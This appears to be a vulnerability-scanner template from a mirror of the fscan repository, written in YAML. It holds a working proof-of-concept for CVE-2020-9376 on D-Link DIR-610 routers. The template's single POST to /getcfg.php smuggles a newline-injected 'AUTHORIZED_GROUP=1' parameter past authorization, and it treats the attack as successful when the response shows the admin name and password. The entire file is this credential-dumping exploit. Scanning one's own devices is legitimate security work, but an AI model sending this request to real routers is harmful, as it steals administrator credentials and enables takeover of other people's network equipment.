mirror of https://github.com/qwqdanchun/fscan.git
16 lines
588 B
YAML
16 lines
588 B
YAML
name: poc-yaml-dlink-cve-2020-9376-dump-credentials
|
|
rules:
|
|
- method: POST
|
|
path: /getcfg.php
|
|
headers:
|
|
Content-Type: application/x-www-form-urlencoded
|
|
body: >-
|
|
SERVICES=DEVICE.ACCOUNT%0aAUTHORIZED_GROUP=1
|
|
expression: >
|
|
response.status == 200 && response.content_type.contains("xml") && response.body.bcontains(b"<name>Admin</name>") && response.body.bcontains(b"</usrid>") && response.body.bcontains(b"</password>")
|
|
detail:
|
|
author: x1n9Qi8
|
|
Affected Version: "Dlink DIR-610"
|
|
links:
|
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9376
|